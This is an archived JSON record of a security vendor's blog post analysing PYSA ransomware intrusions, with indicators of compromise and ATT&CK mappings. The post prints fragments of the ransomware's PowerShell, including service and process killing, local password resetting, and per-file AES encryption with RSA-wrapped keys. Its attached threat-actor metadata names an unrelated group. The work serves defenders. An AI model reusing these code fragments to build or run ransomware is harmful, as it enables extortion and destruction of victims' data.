{
	"id": "2514d483-ecd7-4fb4-829b-a6e1e7145bcb",
	"created_at": "2026-04-06T00:12:27.613881Z",
	"updated_at": "2026-04-10T03:35:21.396795Z",
	"deleted_at": null,
	"sha1_hash": "a59981558df774ba63c7bd6773cc0f1eb7134899",
	"title": "PYSA Ransomware: Technical Overview and Protection Strategies",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2538254,
	"plain_text": "PYSA Ransomware: Technical Overview and Protection Strategies\r\nBy James Haughom\r\nPublished: 2022-04-18 · Archived: 2026-04-05 21:04:27 UTC\r\nBy James Haughom and Niranjan Jayanand\r\nIntroduction\r\nPYSA (Protect Your System Amigo, aka Mespinoza) has been impacting high-value targets since early 2020, with a\r\nproclivity towards targeting educational and medical entities during the global pandemic. In March 2021, a FBI FLASH\r\nalert was issued concerning the noticeable increase in PYSA campaigns, particularly those against healthcare and\r\neducational targets.\r\nSentinelOne’s DFIR engagement team encountered two particular PYSA ransomware campaigns that displayed some\r\ninteresting tactics that may be of interest to security teams and analysts. In this post, we give a brief overview of PYSA and\r\ndocument the tactics we observed.\r\nPYSA’s tactics are similar to other ransomware contemporaries. The group embraces the multipronged extortion model,\r\nhosting a long-standing blog of victim names and data, although as of early April 2022, the PYSA victim blog has been\r\noffline.\r\nhttps://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/\r\nPage 1 of 11\n\nScreenshot of PYSA blog\r\nOnce a target has been breached, the attackers discover and exfiltrate sensitive and critical data, encrypt victim files, and\r\ndemand a ransom.\r\nPYSA’s primary methods of initial access and delivery have centered around RDP (Remote Desktop Protocol) exploits as\r\nwell as phishing emails. Even with phishing as a first stage, the goal is to extract RDP credentials to make entry via their\r\npreferred method.\r\nThe group relies heavily on LOLBINs and COTS tools, avoiding the use of malware other than for encryption. Tools such as\r\nCobalt Strike, Empire, WinSCP, Advanced IP Scanner and Advanced Port Scanner (and their forks) are often observed in\r\nactive PYSA engagements. The group has also adopted additional tools like Chisel. Cloud storage services (e.g., mega.nz )\r\nare often utilized for data exfiltration, detection of which is many victims’ first indication of infection.\r\nOver the last two years, PYSA has successfully compromised an increasing number of organizations. PYSA targets a\r\nnumber of sectors aside from healthcare and education, including Government, Food \u0026 Agriculture, Real Estate,\r\nEngineering, Utilities and others.\r\nTechnical Details\r\nThe ransomware observed by our team was deployed via a batch script which then called psexec.exe to start a Windows\r\nPowerShell script located at “\\\\$\u003chostname\u003e\\share$\\p.ps1” .\r\nThere were multiple batch scripts in the target directory for multiple deployment methods, e.g., psexec0.bat ,\r\npsexec1.bat , wmi0.bat , wmi1.bat .\r\nThe *0.bat variant calls the PowerShell-based ransomware directly from the network share; the *1.bat variant is\r\ndesigned to copy a services.exe file from that directory to the system Temp directory, and *2.bat file calls that\r\nexecutable on the victim machine. The latter two files are a backup plan in case the initial PowerShell ransomware is\r\nunsuccessful; however, due to the lack of the services.exe file existing in the environment, it appears this went unused.\r\nhttps://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/\r\nPage 2 of 11\n\nAttackers were seen password spraying to gain RDP access to both virtual machines and workstations. They also targeted\r\ndomain controllers and exchange servers heavily, planning to maximize business disruption.\r\nDuring our investigation of the attack stages, we also identified the attacker using psexec for lateral movement and the\r\nfinal ransomware payload encrypted and renamed files with either a .pysa extension or another four character extension.\r\nThe table below summarizes the different tools and techniques used by the PYSA ransomware group at different stages of\r\nthe kill chain.\r\nTECHNIQUES TOOLS\r\nEvasion PowerShell Batch\r\nCred Access PowerShell Empire Koadic Mimikatz\r\nDiscovery IP Scanner Port Scanner PowerShell\r\nPersistence Chisel Cobalt Strike\r\nLat Movement PsExec RDP Batch Script\r\nBackdoor Chisel\r\nExfiltration MEGASync WindSCP\r\nBelow are some script files identified on multiple endpoints that attackers used for their lateral movement.\r\nFile Name Type File Size\r\nBefore Windows BatchFile 1 KB\r\np Windows Powershell script 5 KB\r\npsexec0 Windows BatchFile 810 KB\r\npsexec1 Windows BatchFile 736 KB\r\npsexec2 Windows BatchFile 585 KB\r\nwmi2 Windows BatchFile 636 KB\r\nwmi2(1) Windows BatchFile 636 KB\r\nwmi2 and wmi2 (1) – uses stolen Domain Administrator credentials to deploy the ransomware en masse across the\r\nenvironment. In our example, the filename used for the deployed payloads was svchost.exe .\r\nThe two wmi*.bat files dropped by the attacker have numerous lines (like the one below) to laterally move and execute an\r\nexecutable by the name svchost.exe from the Temp folder into many different endpoints.\r\nwmic /node:\"\u003cREDACTED\u003e\" /user:\"\u003c\u003cREDACTED\u003e\u003e\" /password:\"\u003c\u003cREDACTED\u003e\u003eprocess call create \"cmd /c c:\\windows\\tem\r\nThis executable is a Chisel Tunneling tool programmed in Go. Pysa threat actors have been consistent with using Chisel for\r\ntunneling, and the same file name and folder path occur in their earlier attacks as well.\r\nThe scripts above were used for various system information discovery tasks, as well as establishing the Cobalt Strike\r\nbeacon, and ultimately the PowerShell-based execution of the ransomware itself.\r\nThe p.ps1 script above is used to kill or terminate services which may interfere with the encryption process. It also\r\nattempts to identify specific anti-virus applications.\r\nhttps://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/\r\nPage 3 of 11\n\nThe s() function will kill services by name, which is passed as an argument to the function. This is typical pre-ransomware deployment behavior to ensure that handles to critical assets (files/DBs) are forcibly closed, allowing the\r\nransomware to obtain a handle and encrypt them.\r\nfunction s($s) {\r\nGet-Service | Where-Object {$_.DisplayName -like \"*$s*\"} | Stop-Service -Force\r\nGet-Service | Where-Object {$_.DisplayName -like \"*$s*\"} | Set-Service -StartupType Disabled\r\n}\r\nServices terminated:\r\nSQL Oracle Citrix\r\nExchange Veeam Malwarebytes\r\nSharepoint Quest Backup\r\nThe function p() is used to terminate processes by name using the WMIC utility. The name of the process to be terminated\r\nis passed as an argument to the function. The following processes are killed by the malware.\r\nacronis adobe agent Agent AlwaysOn\r\nanydesk apache Arcserve autodesk Backup\r\nbarracuda center chrome citrix Citrix\r\nCore.Service database def dev endpoint\r\nEndpoint engine exchange firefox Framework\r\nhttp java logmein Malware manage\r\nmicrosoft Mongo monitor OCS Inventory office\r\nprotect QBCF QBData QBDB QuickBooks\r\nsage secure security segurda server\r\nsilverlight solarwinds sprout sql SQL\r\nteamviewer veeam Veeam vnc web\r\nfunction p($p) {\r\n wmic process where \"name like '%$p%'\" delete\r\n}\r\nThe script also tags affected systems with a text file, writing the content “I’ll be back”. This text file is written to C:\\log\\\r\n\u003ccomputer name\u003e.txt .\r\nNew-Item -Path \"\\\\\u003c\u003ccomputer name\u003e\u003e\\log$\" -Name \"$name.txt\" -ItemType \"file\" -Value \"I'll be back.\";\r\nFinally, the malware changes the password of all local users to the value of the first 13 characters of the MD5 hash of the\r\nusername with the string “ololo” appended. For example, the password for the username “admin” will be set to the first 13\r\ncharacters of the MD5 hash of the string “adminololo”.\r\nhttps://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/\r\nPage 4 of 11\n\nforeach ($user in $localusers)\r\n{\r\n $myUser = \"$($user)ololo\"\r\n $hash = Get-StringHash $myUser\r\n $pass = $hash.substring(0, 13)\r\n ([adsi]\"WinNT://$env:COMPUTERNAME/$user\").SetPassword(\"$pass\");\r\n}\r\nUse Of Chisel Tunneling Tool\r\nDuring the course of our investigation, we encountered three different Chisel samples in total, all of which were DLLs,\r\nprogrammed in Go. Chisel is a cross-platform traffic tunneling tool, utilized by multiple threat actors. The release version of\r\nChisel consists of a single binary that covers both client and server functionality. The DLLs are wrappers to leverage the\r\nproject’s client side code. These DLLs function to decrypt the client configuration’s fields (IP, port, …), create a new\r\ninstance of the Chisel client, and then invoke the client.\r\nDigging deeper into the specific Chisel samples, we can see a few things including the various dependencies.\r\nPackages \u0026 Dependencies for Chisel tool\r\nThe DLL’s original filename was magic.dll , with the main payload being stored in the “Debug” export.\r\nStrings are individually XOR decrypted at runtime, including the C2 URL. This URL is then passed to the magicSocks\r\nfunction.\r\nhttps://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/\r\nPage 5 of 11\n\nEncryption Details (via PowerShell)\r\nBeyond the use of Chisel, there are some interesting highlights within the execution of PYSA. The p.ps1 script is used to\r\nprepare the environment, as well as execute the actual ransomware with the desired configuration.\r\nThe ransomware enumerates drives to encrypt via WMI , targeting only “fixed” drives.\r\n[array]$target_drives = get-wmiobject win32_volume | ? { $_.DriveType -eq 3 } | % { get-psdrive $_.DriveLetter\r\nA pool of workers is used to speed up the encryption process by running jobs in parallel. These jobs are limited to 20\r\nrunning at a time.\r\nwhile ($running_jobs.Count -gt $max_workers)\r\n{\r\n Start-Sleep -Seconds 5;\r\n [array]$running_jobs = $worker_jobs | Where { $_.State -eq \"Running\" };\r\n}\r\nTarget directories are enumerated on each fixed drive, skipping critical folders to avoid rendering the victim’s system\r\ninoperable. Directories in the root folder of the drive matching the following criteria are skipped (“*” is used as a wildcard):\r\n*Windows*\r\n*Program Files*\r\n*ProgramData*\r\nGet-ChildItem \"$( $disk )*\" -Recurse -Force -Exclude \"*Windows*\", \"*Program Files*\", \"*ProgramData*\" | ? { $_\r\nThe ransomware includes one exception to the “*Program Files*” directory, targeting folders within the “C:\\Program\r\nFiles\\*SQL*” directory. This is to ensure that SQL databases and other high-value SQL-related files are encrypted.\r\nGet-ChildItem \"C:\\Program Files*\" -Force -Recurse -Include \"*SQL*\" | Where { $_.PSIsContainer } |% { SubSqlIte\r\nOnce target folders have been enumerated, they are passed to a worker as a job. Each job executes a ScriptBlock that expects\r\ntwo arguments. The first argument is a base64 string of directories to encrypt, delimited by a “|” .\r\n$DVXJwpT = $args[0];\r\n$include_zip = $args[1];\r\n$JLzbvlx = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($DVXJwpT));\r\n[array]$target_dirs = $JLzbvlx.split(\"|\");\r\nhttps://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/\r\nPage 6 of 11\n\nThe second argument is an option to have the ransomware run in a specific mode to target zip files for encryption, which\r\nrequires the value “1”.\r\nif ($include_zip -eq 1)\r\n{\r\n [array]$target_files = Get-ChildItem $qlsL -Force -Include \"*.zip\" | Where { !$_.PSIsContainer } | Where {\r\n}\r\nIf this option is not enabled, then the ransomware will iterate through the target directories excluding the following file\r\nextensions from the encryption process.\r\n.ax .dll .exe .inc\r\n.lnk .msi .ps1 .README\r\n.search-ms .sys .tlb .zip\r\n[array]$target_files = Get-ChildItem $qlsL -Force -Exclude \"*.zip\", \"*.inc\", \"*.ax\", \"*.tlb\", \"*.msi\", \"*.lnk\"\r\nOnce this list of files is generated, each file path is passed to the crypt() function to perform the encryption.\r\nforeach ($target_file in $target_files_list)\r\n{\r\n crypt($target_file.FullName);\r\n}\r\nWithin the crypt() function, a random 32-byte AES key is generated for each individual target file. Along with the key, a\r\nrandom 16 byte initialization vector (IV) is generated using the RNGCryptoServiceProvider class.\r\n$rng_crypto_service_provider = New-Object System.Security.Cryptography.RNGCryptoServiceProvider;\r\n$aes_key = New-Object byte[] 32;\r\n$rng_crypto_service_provider.GetBytes($aes_key);\r\n$init_vec = New-Object byte[] 16;\r\n$rng_crypto_service_provider.GetBytes($init_vec);\r\nThe AES service provider is then instantiated, setting the key and IV to the randomly generated values mentioned\r\npreviously.\r\n$aes_crypto_service_provider = New-Object System.Security.Cryptography.AesCryptoServiceProvider;\r\n$aes_crypto_service_provider.Key = $aes_key;\r\n$aes_crypto_service_provider.IV = $init_vec;\r\n$aes_crypto_service_provider.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;\r\nThe RSA service provider is then instantiated using a hardcoded RSA XML string.\r\n$encryptor = $aes_crypto_service_provider.CreateEncryptor();\r\n$rsa_crypto_service_provider = New-Object System.Security.Cryptography.RSACryptoServiceProvider -ArgumentList\r\n$rsa_crypto_service_provider.PersistKeyInCsp = $false;\r\n$rsa_crypto_service_provider.FromXmlString($rsa_key_string);\r\n$rsa_key_string = \"sLdwS+FAAou46fSHkm/5NzsuRy5l5Iqf/+Jy/ZLCbPmrKVvhre0R1no1[...]\"\r\nThe AES key and IV are both then encrypted with the RSA key.\r\nhttps://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/\r\nPage 7 of 11\n\n$qGOTKey = $rsa_crypto_service_provider.Encrypt($aes_key, $false);\r\n$Dbw = $rsa_crypto_service_provider.Encrypt($init_vec, $false);\r\nThe ransomware then proceeds to encrypt the contents of the file starting at the offset 1671.\r\n$PBz = 1671;\r\n[...]\r\n$file_stream.Seek($PBz, [System.IO.SeekOrigin]::Begin);\r\n[long]$iGzfUwq = $file_stream.Read($mctMK, 0, $mctMKSize);\r\n$qGOT = $encryptor.TransformFinalBlock($mctMK, 0, $iGzfUwq);\r\n$file_stream.Seek($PBz, [System.IO.SeekOrigin]::Begin);\r\n$file_stream.Write($qGOT, 0, $iGzfUwq);\r\nApproximately 10% of each file is encrypted, calculated using the following logic.\r\n[long]$mctMKSize = $MZKSize / 10;\r\nif ($mctMKSize -gt 6225920)\r\n{\r\n $mctMKSize = 6225920;\r\n}\r\nelse\r\n{\r\n $SZdRf = [math]::floor($mctMKSize / 1024);\r\n if ($SZdRf -eq 0)\r\n {\r\n $SZdRf = 1;\r\n }\r\n $mctMKSize = 1024 * $SZdRf;\r\n}\r\nThe encrypted AES key and IV are both written to the end of the newly encrypted file, and the file name is appended with\r\nthe custom extension chosen by the attacker.\r\n$file_stream.Seek(0, [System.IO.SeekOrigin]::End);\r\n$file_stream.Write($qGOTKey, 0, $qGOTKey.Length);\r\n$file_stream.Write($Dbw, 0, $Dbw.Length);\r\n$file_stream.Close();\r\nRename-Item -Path $file_to_encrypt -NewName \"$( $file_to_encrypt ).redacted\";\r\nProtecting Against PYSA Ransomware\r\nSentinelOne customers are fully-protected against PYSA ransomware.\r\nhttps://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/\r\nPage 8 of 11\n\nEtt fel inträffade.\r\nDet går inte att köra JavaScript.\r\nEtt fel inträffade.\r\nDet går inte att köra JavaScript.\r\nConclusion\r\nPYSA has outlasted some of its contemporaries through careful choice of targets as well as affiliates. Although the group’s\r\nTTPs cannot be described as technically advanced, the use of the Chisel tunneling tool and preparation of the target\r\nenvironment via PowerShell scripts is sufficiently novel to be worth documenting. We hope that providing visibility into all\r\nthe various steps in the attack chain will be helpful for defenders and threat hunters to identify, detect and prevent such\r\nattacks.\r\nIndicators of Compromise\r\nhttps://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/\r\nPage 9 of 11\n\nSHA1\r\n6b6855931e69d27f5f2e2d828fbeb4db91688996\r\n6aa7b2744a7e3975f0dff3672ec633b687ef5fbd\r\n598da6d3ac08e21c39807fffabd2f597edb4cbb8\r\n9200e264a9916534798d79a9aab69359f65e5fc7\r\n11e399bed1a2e4ac51dfbae16a21f1adaff7c95f\r\nef14422bf5d013878cd12abf44a7720b92d1750c\r\n8e6c7618699ac39393aa01fd99848f868c0921f2\r\n407933cdb8ba12cf61606803be354b87f2674321\r\nd02608e1771af7c19413ecf504e2df2989f25da3\r\n69dab8db13bbe0b9ddac7aeeb52fde3928030e43\r\n44013f5f6f5c88482441f1fa673e1ada7d6e845f\r\na80b1f9f44156bc876b9f1e641745af1a5a77be2\r\nb435fedf7e40e3ef24dba050102d63e2d5aa2e1e\r\n94a351849632c435f6809eda080f52e6d0ad1195\r\nf7d7567d1721478eee276001aeeba44473a713ef\r\n6f5f822260e4deaa859f3f17e81d9349950d9e34\r\n51cbc9455b7781cf0529f299631e59016fe52e95\r\n8ec2266a0e4c807973a27bc9cf5b10b4d11f6c5c\r\n52b2fc13ec0dbf8a0250c066cd3486b635a27827\r\n425209b891142704462baf14048d0dd59d0c7561\r\nSHA256\r\ne9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead\r\n44f1def68aef34687bfacf3668e56873f9d603fc6741d5da1209cc55bdc6f1f9\r\n0433efd9ba06378eb6eae864c85aafc8b6de79ef6512345294e9e379cc054c3d\r\n164cb8e82d7e07cca0409925cadd8be5e3e8e07db88526ff7fe87596c6a6bd07\r\n7c774062bc55e2d0e869d5d69820aa6e3b759454dbc926475b4db6f7f2b6cb14\r\n58ebe9b1c926c87dc1e9d924942504a56456007bff8de4932ef18e476da700c2\r\n6f3cd5f05ab4f404c78bab92f705c91d967b31a9b06017d910af312fa87ae3d6\r\n1e39243c218056dbe72b6b889f2245b3d0f49f29952950d4b83581263c09c1ae\r\nfb31b023d2545563862c9c314d91770fcec7bb7a4b13abfdb5244266a67446a3\r\n153222163442b304f5cee295268115c9cfdf0f1168f49f9e3fae52340eee51ec\r\nd1b6ee9b716fe48e51ac4e6bec691366bb08d507773d61a5d14fb15ec5e25e2b\r\n6f4338a7a3ef8e491279ae81543a08554cad15d1bce6007047bc4449d945b799\r\n051fb654403340420102430f807ea41ab790666488d897dc5b0008e99fed47d6\r\n75c8e93ffcfd84f0d3444c0b9fc8c9a462f91540c8760025c393a749d198d9db\r\n7fd3000a3afbf077589c300f90b59864ec1fb716feba8e288ed87291c8fdf7c3\r\n931772ac59f5859e053589202c8db81edc01911391fe5b32c9abb5bbc2b06e43\r\naf99b482eb0b3ff976fa719bf0079da15f62a6c203911655ed93e52ae05c4ac8\r\n90cf35560032c380ddaaa05d9ed6baacbc7526a94a992a07fd02f92f371a8e92\r\n4770a0447ebc83a36e590da8d01ff4a418d58221c1f44d21f433aaf18fad5a99\r\ne4287e9708a73ce6a9b7a3e7c72462b01f7cc3c595d972cf2984185ac1a3a4a8\r\nMITRE ATT\u0026CK\r\nT1027.002 – Obfuscated Files or Information: Software Packing\r\nT1007 – System Service Discovery\r\nT1059 – Command and Scripting Interpreter\r\nTA0010 – Exfiltration\r\nT1082 – System Information Discovery\r\nT1490 – Inhibit System Recovery\r\nhttps://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/\r\nPage 10 of 11\n\nT1048.003 – Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol\r\nT1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage\r\nS0583 – PYSA\r\nS0154 – Cobalt Strike\r\nT1110 – Brute Force\r\nT1562 – Impair Defenses: Disable or Modify Tools\r\nT1070.004 – Indicator Removal on Host: File Deletion\r\nT1036 – Masquerading: Match Legitimate Name or Location\r\nT1112 – Modify Registry\r\nT1046 – Network Service Scanning\r\nT1003.001 – OS Credential Dumping: LSASS Memory\r\nT1021.001 – Remote Service: Remote Desktop Protocol\r\nT1489 – Service Stop\r\nT1016 – System Network Configuration Discovery\r\nT1569.002 – System Services: Service Execution\r\nT1552.001 – Unsecured Credentials: Credentials in Files\r\nSource: https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/\r\nhttps://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/"
	],
	"report_names": [
		"from-the-front-lines-peering-into-a-pysa-ransomware-attack"
	],
	"threat_actors": [
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434347,
	"ts_updated_at": 1775792121,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a59981558df774ba63c7bd6773cc0f1eb7134899.pdf",
		"text": "https://archive.orkl.eu/a59981558df774ba63c7bd6773cc0f1eb7134899.txt",
		"img": "https://archive.orkl.eu/a59981558df774ba63c7bd6773cc0f1eb7134899.jpg"
	}
}